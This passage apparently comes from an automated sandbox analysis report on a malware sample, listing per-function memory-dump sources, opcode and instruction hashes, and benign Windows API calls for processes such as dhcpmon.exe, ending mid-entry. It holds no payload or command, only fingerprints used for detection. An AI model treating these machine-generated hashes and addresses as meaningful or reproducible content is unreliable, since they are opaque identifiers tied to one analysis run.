Instruction ID: 0a973c8144e2560a4eb35482ec6d4abe77adbb4a3631930bf04900132e9f09cc
Opcode Fuzzy Hash: 668e3fde8e6537f3d0ec448e6922e1d67742b62c27992e7757cc13de348145c9
Instruction Fuzzy Hash: AAE092766006008BD650CF0AEC81452F7D8EB88630B18C47FDC0D8B710E675B504CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 047E1EF8, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.233858154.00000000047E0000.00000040.00000001.sdmp, Offset: 047E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52afaeac54e4850876b12c73d61c4056f4004178222f8685dde5d36d7300059e
Instruction ID: 477746dad35132c9616faaae1f252972d1d6bce607903dd47ded6cfebe44b46d
Opcode Fuzzy Hash: 52afaeac54e4850876b12c73d61c4056f4004178222f8685dde5d36d7300059e
Instruction Fuzzy Hash: 8DE0C2313041118BC31862BDE004A5E77DEDBC9324B10407BF509CB365CEB5EC0647A5

Uniqueness

Uniqueness Score: -1.00%

Function 047E0251, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.233858154.00000000047E0000.00000040.00000001.sdmp, Offset: 047E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f66209a31fdc023ace7efd2aaebffb6ecf3c2564da78e87a12114fb5b61b127
Instruction ID: 7d2fad4c22c9856320799962c61696127b2a8f8451a18211b56cc93317fd52b2
Opcode Fuzzy Hash: 3f66209a31fdc023ace7efd2aaebffb6ecf3c2564da78e87a12114fb5b61b127
Instruction Fuzzy Hash: 60D01236B00010CFEF1096BEF4041ECB7A2EFC5225B1001BBD60BDB651E9319C1A8701

Uniqueness

Uniqueness Score: -1.00%

Function 005E23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.233436947.00000000005E2000.00000040.00000001.sdmp, Offset: 005E2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efeac8b84b74219580131ea6fdc3b40d9257293db95eac5820a02f319767f339
Instruction ID: f7832e8fc74fef798951a89a3dbc8c42ab42e2fb9ae88548f9973060caff1b25
Opcode Fuzzy Hash: efeac8b84b74219580131ea6fdc3b40d9257293db95eac5820a02f319767f339
Instruction Fuzzy Hash: 84D05E79205BC14FE72A8B1DC1A8B953BD8BB91B04F4644F9E8408B6A7C369D981D200

Uniqueness

Uniqueness Score: -1.00%

Function 005E23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.233436947.00000000005E2000.00000040.00000001.sdmp, Offset: 005E2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c1bd51188c0095e4e31f28e958340f23925b554d6239a38fddeb324c1be931
Instruction ID: ba0035d7c4eb1a2eb1e9e53273ee7b2f66961ba87ca5cb003e525fec1015c724
Opcode Fuzzy Hash: 94c1bd51188c0095e4e31f28e958340f23925b554d6239a38fddeb324c1be931
Instruction Fuzzy Hash: 5CD05E342002818BC719DB0DC194F593BD8BB45B00F1648E8AC408B2B6C3A8DC81CA00

Uniqueness

Uniqueness Score: -1.00%

Function 047E0130, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.233858154.00000000047E0000.00000040.00000001.sdmp, Offset: 047E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e34fd2815f3c81a77c363efed0f4db269b60c7c4af5f5f578b437cf5657bf8c2
Instruction ID: c45992017eb830a35940dfe919c088fc1cd00f2c84ff1c069b10a67d610addc1
Opcode Fuzzy Hash: e34fd2815f3c81a77c363efed0f4db269b60c7c4af5f5f578b437cf5657bf8c2
Instruction Fuzzy Hash: 5AC02B30340A4C07DF001FF57C4437A338C4780204F000431B80DCB240FD6EE8004140

Uniqueness

Uniqueness Score: -1.00%

Function 047E1E20, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.233858154.00000000047E0000.00000040.00000001.sdmp, Offset: 047E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 078972f2f6958d689c3a7009b749b4eca53a44883092a0902f1175c5b82304df
Instruction ID: ab069c853305b99bf26fc00032ba0166cc71a0a4374eb8ae182e289ee9a53b63
Opcode Fuzzy Hash: 078972f2f6958d689c3a7009b749b4eca53a44883092a0902f1175c5b82304df
Instruction Fuzzy Hash: 78C01274418201AFC740EF28EC4596A7BF0EA80605F40CA2DE48DC2110F370561CCB52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: dhcpmon.exe PID: 7028 Parent PID: 3388 dhcpmon.exeCOMMON

Executed Functions

Function 0173A2C1, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0173A371

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9d01a1f0e07f1f0458807d1c1c3ea2ba528180c570ab99e27601ba537f8753b4
Instruction ID: 4cf65c0df696ab71e66ce7a58705c49f36eadab96b74600e97a8726b3f522c24
Opcode Fuzzy Hash: 9d01a1f0e07f1f0458807d1c1c3ea2ba528180c570ab99e27601ba537f8753b4
Instruction Fuzzy Hash: 15317C71508780AFE722CF25DC85F66FFF8EF46710F08849AE9858B253D365A808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0173A2F2, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0173A371

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fb7105d4278719518f6f8d20467addb82ce39a3b9a2cfbc87505a9431f781f38
Instruction ID: 66a6c0aba5f3d766119b8f1454490ac16be5c09379d3a4b2c2c5ee12e124ed84
Opcode Fuzzy Hash: fb7105d4278719518f6f8d20467addb82ce39a3b9a2cfbc87505a9431f781f38
Instruction Fuzzy Hash: F4218E71500700AFEB21DF66DD85B66FBE8EF44710F0484A9EA85CB652D371E404CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0173AE40, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

VerLanguageNameW.KERNELBASE(?,00000E2C,?,?), ref: 0173AED6

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: LanguageName
String ID:
API String ID: 2060303382-0
Opcode ID: 7d0dc64250b2124fd96e91c1a5b05e22e9a45e4a117c9cc66cb50ef5ca620a7d
Instruction ID: bd96c3a8c1a0c00122ae1f1f5af9cfd95c373bd2ab7c7f8740d2d70147f111af
Opcode Fuzzy Hash: 7d0dc64250b2124fd96e91c1a5b05e22e9a45e4a117c9cc66cb50ef5ca620a7d
Instruction Fuzzy Hash: EA21A7754097C06FD3138B25DC51B62BFB4EF87B10F0981DBE8848B553D224A91AC7B6

Uniqueness

Uniqueness Score: -1.00%

Function 0173A483, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,CD039A31,00000000,00000000,00000000,00000000), ref: 0173A509

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 222e744ce2b68aa8ef0ff5db2eb396ce5c2b1c74b00a756ca35b42377b05ae5b
Instruction ID: 5066b3c22de1fe5b0cc7c5151d7a895239c5c82e0e78535faec0f754a3637691
Opcode Fuzzy Hash: 222e744ce2b68aa8ef0ff5db2eb396ce5c2b1c74b00a756ca35b42377b05ae5b
Instruction Fuzzy Hash: F721C3B64097806FE7128B259C41FA6BFA8DF86710F1880DAE984CB193D364A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 0173A3C8, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0173A43C

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: f1969634962ad2169678a3e4514a17a4d781b1ab964beb9ef2b49074b5d51703
Instruction ID: e08086ae9aee619b4f35c6fff1d57021a5f65bc6a8b9fa58f2c154fecf0c1f8e
Opcode Fuzzy Hash: f1969634962ad2169678a3e4514a17a4d781b1ab964beb9ef2b49074b5d51703
Instruction Fuzzy Hash: A421AFB540A7C09FD7138B29DC95A96BFB4AF47220F0980DBDC85CF1A3D2689808C772

Uniqueness

Uniqueness Score: -1.00%

Function 0173A816, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E2C,CD039A31,00000000,00000000,00000000,00000000), ref: 0173A895

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: a67fd8cee43c09a6aefd9d4f92b946f25a6d2ee4d0ba9ea09a8707ad3c2978ca
Instruction ID: 6de920e4aaa5e7eb9253c15801404e1b2076ec2daece816232415c46196847d0
Opcode Fuzzy Hash: a67fd8cee43c09a6aefd9d4f92b946f25a6d2ee4d0ba9ea09a8707ad3c2978ca
Instruction Fuzzy Hash: 82219272405384AFEB22CF55DC85F97FFB8EF45610F08849AE9859B152C374A509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0173AA16, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 0173AA87

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: FileInfoSizeVersion
String ID:
API String ID: 1661704012-0
Opcode ID: 037558a72fd97b8258e8cdea0572aaf1f1a0a86ac2b6e525b9a8f7aef3c176ae
Instruction ID: c5ad9ffae81597f48d221fcb16fcac0c92600c1f8a45ff0f0e714352131d54d9
Opcode Fuzzy Hash: 037558a72fd97b8258e8cdea0572aaf1f1a0a86ac2b6e525b9a8f7aef3c176ae
Instruction Fuzzy Hash: 8B218E754093849FD7128F29DC85B52BFB4EF46210F0984DAD984CF253D2699909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0173A836, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E2C,CD039A31,00000000,00000000,00000000,00000000), ref: 0173A895

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d713564a3ed7931914f14335c7a55d9bad557b6c52af09fb49621af2dbfbb6ce
Instruction ID: 0ccbcb3a2cec99cd2599a68d2e65e3a1489b54564a5b8a772d85e93c4c1a1e0a
Opcode Fuzzy Hash: d713564a3ed7931914f14335c7a55d9bad557b6c52af09fb49621af2dbfbb6ce
Instruction Fuzzy Hash: D311C472440704AFEB22CF55DC85FAAFBA8EF84710F0484AAEE458B152D374A405CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0173AAD8, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 0173AB3D

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: FileInfoVersion
String ID:
API String ID: 2427832333-0
Opcode ID: 083639071c8b962dbd81aa698587b0f7343d48eddadccbf3c7e0046a1b2ba625
Instruction ID: 81f339b4961d39552833e5ddeedf15d3f8996a7d710997238043171ea84bae46
Opcode Fuzzy Hash: 083639071c8b962dbd81aa698587b0f7343d48eddadccbf3c7e0046a1b2ba625
Instruction Fuzzy Hash: C0119375504784AFDB228F19DC45F66FFB8EF46610F08849EED858B653D261E808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0173A1F4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0173A290

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: e6344e504c3506c19eee497a2cb174bca315fbf55b98e884ea1260707a19f9c7
Instruction ID: 8b653f695db014ed9ec5b1a2c9b3fb9a5cca5049e3c8f86bec70ac74ceb2d9e0
Opcode Fuzzy Hash: e6344e504c3506c19eee497a2cb174bca315fbf55b98e884ea1260707a19f9c7
Instruction Fuzzy Hash: 9D113D3550D3C08FD7138B259895754FF70AF47220F1D81DBC884CF2A3C26A9949DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0173A4B6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,CD039A31,00000000,00000000,00000000,00000000), ref: 0173A509

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 8903987981420df8463e23b70ec697f6796230a6dc0318845c13dad70c97649e
Instruction ID: 331d0e46656efdea724e99c83bec68d30be02c1aea6dcdd454ae4d9eff91f24f
Opcode Fuzzy Hash: 8903987981420df8463e23b70ec697f6796230a6dc0318845c13dad70c97649e
Instruction Fuzzy Hash: E401C471500604AFE721CB15DD85B6AFB98DF84B20F14C09AED459B282D374A545CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0173A8DF, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNELBASE ref: 0173A949

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 03df0d52ce9f7e643aff6cb73e91c12024fd9fb5c4ddb3d518051e6025c8345c
Instruction ID: 71c4e63a001362bd363ebe80f359c69d0f6fbc799de0ee807a0d0e6a7af19856
Opcode Fuzzy Hash: 03df0d52ce9f7e643aff6cb73e91c12024fd9fb5c4ddb3d518051e6025c8345c
Instruction Fuzzy Hash: 6411BF754097C45FD7128B29DC85BA2BFA4EF47324F0A80DADD848F163D364A909CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0173A23C, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0173A290

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 65a0b023f00a5a8c0906ec7d3ece428f67067cea71d57386d3f46802749c137a
Instruction ID: 73685f8b101e6f8301c757575cd2d8c9da28e1b96b86d3c712e9a20760ea6cd0
Opcode Fuzzy Hash: 65a0b023f00a5a8c0906ec7d3ece428f67067cea71d57386d3f46802749c137a
Instruction Fuzzy Hash: 271184754097C4AFDB128B19DC84B62FFB4DF46624F0880DAED858F253D275A808CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0173AAFA, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 0173AB3D

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: FileInfoVersion
String ID:
API String ID: 2427832333-0
Opcode ID: 45d03438e53f9242e6f327c6171e3ccc47415454ef9acd87af882bfa646a54e0
Instruction ID: bb383ede64b38b3915a781f6e0b3bc2ab3e60945692379ae70c25b636c6318cf
Opcode Fuzzy Hash: 45d03438e53f9242e6f327c6171e3ccc47415454ef9acd87af882bfa646a54e0
Instruction Fuzzy Hash: 0A019235500644DFDB25CF1AD885B66FBE4EF45620F08C49ADD86CB653D271E448CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0173AA4A, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 0173AA87

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: FileInfoSizeVersion
String ID:
API String ID: 1661704012-0
Opcode ID: 5dd6528989efb68afa48ebcffd0dbbde21ed121f934f2a944f23ec534a4595a2
Instruction ID: 361628e82f2e5f1b6d9d923231eacd4f31deb894e4d615f1b73c8214b9ce3873
Opcode Fuzzy Hash: 5dd6528989efb68afa48ebcffd0dbbde21ed121f934f2a944f23ec534a4595a2
Instruction Fuzzy Hash: CF01B1769002409FEB10CF59D985766FFE4EF44620F08C4AADD49CB307D274E505CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0173AE86, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

VerLanguageNameW.KERNELBASE(?,00000E2C,?,?), ref: 0173AED6

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: LanguageName
String ID:
API String ID: 2060303382-0
Opcode ID: efdd096d371df4a1d4f325c819387ac4a3fd10517bb866bcb1e02a7203c1e69e
Instruction ID: b7470df8f0713cf262b4a04484fffbb397f1bbf2010cedb25496326e884a304c
Opcode Fuzzy Hash: efdd096d371df4a1d4f325c819387ac4a3fd10517bb866bcb1e02a7203c1e69e
Instruction Fuzzy Hash: 6401A272500600ABD210DF16DC82B26FBA8FB88B20F14C15AED084B745E331F516CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0173A40A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0173A43C

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: db85907045f5f876aa36d4b7b8573bbe06583b476e69f976d724fedc66cb3e1f
Instruction ID: 31b9c498929962ad447e418ba04200df393c2f743dc7e548c23fb26905056594
Opcode Fuzzy Hash: db85907045f5f876aa36d4b7b8573bbe06583b476e69f976d724fedc66cb3e1f
Instruction Fuzzy Hash: AE01F2759006409FDB11CF1DD889766FBA4DF44220F08C0EADD89CF253D379A804CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0173A25E, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0173A290

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: f77c6801ae44c88fcf477d292d7c0c1c220509eabb5f7e390cc9f5763fee3644
Instruction ID: f249f23619165f115d72374010f90ad15ecc27d2de66793fe70080a0577c2268
Opcode Fuzzy Hash: f77c6801ae44c88fcf477d292d7c0c1c220509eabb5f7e390cc9f5763fee3644
Instruction Fuzzy Hash: 38F081358086448FDB118F09D885766FBA4DF88720F08C0DADD498B657D275A404CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 0173A91A, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNELBASE ref: 0173A949

Memory Dump Source

Source File: 0000000F.00000002.247160947.000000000173A000.00000040.00000001.sdmp, Offset: 0173A000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 285eecb8560b90cfa7e8134aee384e1cc5e2c5ecbfe7c8b35fba0e326c4971fa
Instruction ID: d775e5d56d95bdc8ef882ccde678f05bc193e2f50388e057ab4ee98a6e5aad3a
Opcode Fuzzy Hash: 285eecb8560b90cfa7e8134aee384e1cc5e2c5ecbfe7c8b35fba0e326c4971fa
Instruction Fuzzy Hash: 70F0AF388006448FDB10CF1AD88A766FBA0DF44620F08C0DADD899B253D275A804CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05861B03, Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24dfecfa8e16cf53d360fdf35b14ee6584470f942cddcd71e3bd377fe87d20fd
Instruction ID: fa6530a8b755b8024a0e1490d1f476e28123281a48626dbede127182c3b5aa14
Opcode Fuzzy Hash: 24dfecfa8e16cf53d360fdf35b14ee6584470f942cddcd71e3bd377fe87d20fd
Instruction Fuzzy Hash: 9971AC30700304DFD728DB24D868B2AB7E6FB85721F14C46AE95ACB692DB75EC45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 05861540, Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da8daeb9d27d30f5d257294add093b266c0689ac53aa74bd8bf8b7f5b596ddea
Instruction ID: 0cde6e7ed6430ad38cddfc58f3c478eff4818e1addd3fcddddeda84b91517971
Opcode Fuzzy Hash: da8daeb9d27d30f5d257294add093b266c0689ac53aa74bd8bf8b7f5b596ddea
Instruction Fuzzy Hash: A8618A357003058FDB15AB38D45C76E77A7BBC8361F18806AE806CB399EEB59C46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05860007, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b93e8416e75aa83d939cc54e25fb18c9bb74b849eb4a4bc0f6f142e87eb248b
Instruction ID: 6a8b51ac7a8709540677b7a20fe976d6df09ac646cca2beb01f74ab1d39e9a7d
Opcode Fuzzy Hash: 2b93e8416e75aa83d939cc54e25fb18c9bb74b849eb4a4bc0f6f142e87eb248b
Instruction Fuzzy Hash: 0931B16190D3C58FD702EB30D85975A7FB1FF82204F1988AED485CB2A7EA789C48C752

Uniqueness

Uniqueness Score: -1.00%

Function 05860150, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52505446ffd95c56b626e3a40792e725a332f356e81028603c4db15e1cbff35a
Instruction ID: 7189720ec561a854475cab0a7755590c044be1ce5a746a6de26007e1a520488c
Opcode Fuzzy Hash: 52505446ffd95c56b626e3a40792e725a332f356e81028603c4db15e1cbff35a
Instruction Fuzzy Hash: 0D214472E00518ABDB15DFB6ED449DEBBB6FF88321F14812AE505F3214EA319901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05861770, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 390aa6960ab4ca85455c894d0607cdfcc830df3e050985444a20b64cf40f8c41
Instruction ID: 2857bd96033304730da3d856beacb1bec0beb74a82dcf2db3c9f65a4028c8960
Opcode Fuzzy Hash: 390aa6960ab4ca85455c894d0607cdfcc830df3e050985444a20b64cf40f8c41
Instruction Fuzzy Hash: 2C210436B002148FDB109B78E4087AD37E7FF88321F148066E90ACB39ACA758D44C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 05861453, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2697d7d38e46ce2549751e2f57d511a226924fa0183b146d5912977d63eee6e1
Instruction ID: 1d3d831dee761af18a5dbeee923a52c698bc71c4e16d78aff9f0ab43c303e010
Opcode Fuzzy Hash: 2697d7d38e46ce2549751e2f57d511a226924fa0183b146d5912977d63eee6e1
Instruction Fuzzy Hash: 192193313043418FD7259B38D85C76EB7AAFBC4651F14806AD806CB395DEB49C43C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 05860521, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfacf9d623a2a6345dabba4ffb36082a5d07ece14036e928b9c23c3f07574d89
Instruction ID: 31e5484d55d9ac5f8cb93e530e9a241b68f2bfeabce4b974104c3504e7e2fb1b
Opcode Fuzzy Hash: dfacf9d623a2a6345dabba4ffb36082a5d07ece14036e928b9c23c3f07574d89
Instruction Fuzzy Hash: B2114C30306292CFCB99A738D02862D36E6EFC5341B1440B8E807CF3A6DE39DC458785

Uniqueness

Uniqueness Score: -1.00%

Function 05861A28, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a3507b62441df8d9880ee9872affb722da15139c0537e8c56b57111253b6d8b
Instruction ID: 03a2872c5ceb1fdb5fc495e28833c87ab18ffd56753faf9744873c69dcb5935c
Opcode Fuzzy Hash: 6a3507b62441df8d9880ee9872affb722da15139c0537e8c56b57111253b6d8b
Instruction Fuzzy Hash: 1811D330301211CFCB199B39D058A6A77E7FF8525675040BED406CB361DB76DC02CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05860530, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ea93a72d5f38f7029a97a72209ccea75cadd054cafa8fdc247f0cb036ac4a29
Instruction ID: ceedbe289a481c03ddd79517a243f232aa3ef6b07dccfacf45f4a1cdbcead504
Opcode Fuzzy Hash: 8ea93a72d5f38f7029a97a72209ccea75cadd054cafa8fdc247f0cb036ac4a29
Instruction Fuzzy Hash: 14113A30302192CFC799B738D06862D36E7AFC5301B1400B8E807CF7A6DE2ADC468796

Uniqueness

Uniqueness Score: -1.00%

Function 05861570, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01209bee7116be010bdd482e3e8ce9500ab946d33ce069d21fb04516dd26ab8
Instruction ID: a45fa28a196b73a1b1620e1c5bef0b9c497f97a6ae7221f9942b7e264d4923d2
Opcode Fuzzy Hash: f01209bee7116be010bdd482e3e8ce9500ab946d33ce069d21fb04516dd26ab8
Instruction Fuzzy Hash: F601B535B002148BD724AA79D88C7AAB3A7FBC4360F148175DD07C7259EB759C04C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0586187B, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247734627.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f9e15908dd94eb2637d225be05b388930d07020d24fa853e77d5f03dfab044d
Instruction ID: 8986e6bef0b6978b88104d30130f28f1e351e336a7b26c5c06f0e42bda69ef02
Opcode Fuzzy Hash: 5f9e15908dd94eb2637d225be05b388930d07020d24fa853e77d5f03dfab044d
Instruction Fuzzy Hash: 21018834B011168BCB18EBB9D468A6E73D3EBC8611B244428C906CB3C9FE29AC45D796

Uniqueness

Uniqueness Score: -1.00%

Function 018405CF, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.247329139.0000000001840000.00000040.00000040.sdmp, Offset: 01840000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a059d250895f6490db08f7fa3cfef80705508a1b1abb09ced075c17b24cd5815
Instruction ID: a35a4a5c66efa634e2de53b0102bab52f94842d4fe3f9d1a4613c70478abbdf9
Opcode Fuzzy Hash: a059d250895f6490db08f7fa3cfef80705508a1b1abb09ced075c17b24cd5815
Instruction Fuzzy Hash: D301D6765097806FD7128B0AAC40862FFA8DF8662070DC09FEC498B612D225A809CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 05861D7B, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

